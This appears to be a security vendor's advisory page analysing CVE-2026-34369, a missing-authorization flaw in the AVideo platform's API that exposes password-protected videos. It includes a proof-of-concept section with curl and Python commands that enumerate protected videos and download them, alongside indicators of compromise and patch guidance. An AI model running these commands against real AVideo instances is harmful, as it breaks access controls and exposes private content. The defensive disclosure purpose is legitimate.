CVE-2026-34369: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34369 is a missing authorization vulnerability in WWBN AVideo, an open source video platform, that allows unauthenticated attackers to bypass password protection on videos by calling API endpoints directly. The get_api_video_file and get_api_video API endpoints return full video playback sources (direct MP4 URLs, HLS manifests) for password-protected videos without performing any password verification. All versions up to and including 26.0 are affected. The vulnerability was published on March 27, 2026, with a fix committed shortly after. It carries a CVSS v3.1 base score of 5.3 (Medium) (Github Advisory, Red Hat).

Technical details

The root cause is CWE-862 (Missing Authorization): the password enforcement logic present in the web UI — implemented via the CustomizeUser::getModeYouTube() hook calling videoPasswordIsGood() — is only invoked during web page rendering and is entirely absent from the API code path. In get_api_video_file (plugin/API/API.php:986-1004), the sole access check is User::canWatchVideoWithAds(), which validates admin status, video active status, and subscription/PPV restrictions but never checks video_password; since password-protected videos have status 'a' (active), they pass all checks. Similarly, get_api_video (plugin/API/API.php:1635-1810) returns full video paths and sources arrays with no password verification. Notably, the proper verification function Video::verifyVideoPassword() exists in the codebase and a dedicated get_api_video_password_is_correct endpoint exists, confirming that password verification was intended but simply never wired into these endpoints (Github Advisory).

Impact

Any unauthenticated attacker can retrieve direct, playable MP4 or HLS URLs for all password-protected videos on an AVideo instance without supplying the correct password, completely nullifying the video password protection feature. The get_api_video endpoint additionally leaks which videos are password-protected (via the video_password field set to '1'), enabling targeted enumeration of protected content. This affects all consumers of the API, including mobile apps, third-party integrations, and direct API clients. There is no integrity or availability impact; the consequence is limited to confidentiality loss of protected video content (Github Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of step-by-step curl commands and Python processing that demonstrate a complete exploitation workflow requiring no authentication or special tooling (Github Advisory). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.031% (10th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify a publicly accessible AVideo instance running version 26.0 or earlier. The API endpoints are unauthenticated and require no credentials.
  2. Enumerate password-protected videos: Send a GET request to the video list API to identify videos with password protection:
curl -s 'https://target.com/plugin/API/get.json.php?APIName=video&rowCount=50' | \
python3 -c "
import json, sys
data = json.load(sys.stdin)
for v in data.get('response',{}).get('rows',[]):
    if v.get('video_password'):
        print(f'ID: {v[\"id\"]}, Title: {v[\"title\"]}, Password Protected: YES')
        print(f'  Direct sources: {json.dumps(v.get(\"sources\",[]) [0] if v.get(\"sources\") else \"none\")}')"
  1. Retrieve full playback sources: Call the get_api_video_file endpoint with the target video ID — no password parameter required:
curl -s 'https://target.com/plugin/API/get.json.php?APIName=video_file&videos_id=<VIDEO_ID>'

The response returns direct MP4/HLS URLs: {"error":false,"response":{"videos_id":"123","video_file":"https://target.com/videos/video_abc/video_abc_HD.mp4","sources":[{"src":"...","type":"video/mp4"}]}} 4. Download protected content: Use the returned URL to download the video directly:

curl -O 'https://target.com/videos/video_abc/video_abc_HD.mp4'

(Github Advisory)

Indicators of compromise

  • Network: Unusual unauthenticated GET requests to /plugin/API/get.json.php?APIName=video_file&videos_id=<ID> or /plugin/API/get.json.php?APIName=video with rowCount parameters from unexpected source IPs; direct HTTP requests to video file paths (e.g., /videos/<filename>/<filename>_HD.mp4) without a preceding authenticated web session.
  • Logs: Web server access logs showing repeated API calls to get.json.php with APIName=video_file or APIName=video parameters from a single IP or user-agent, particularly without any prior authentication activity; subsequent direct downloads of .mp4 files from the /videos/ directory.
  • Application Logs: AVideo application logs showing API responses returning "error":false for video file requests on password-protected video IDs without a video_password parameter being supplied.

Mitigation and workarounds

The fix is implemented in commit be344206f2f461c034ad2f1c5d8212dd8a52b8c7, which adds Video::verifyVideoPassword() checks to both get_api_video_file and get_api_video before returning playback sources, and also corrects get_api_video_password_is_correct to use proper bcrypt comparison instead of direct string equality (AVideo Commit). Administrators should update their AVideo installation to a version incorporating this commit immediately. As a temporary workaround if patching is not immediately possible, implement network-level access controls (e.g., WAF rules or reverse proxy restrictions) to block unauthenticated external access to the get_api_video_file and get_api_video API endpoints, and review access logs for evidence of unauthorized API calls to these endpoints (Github Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management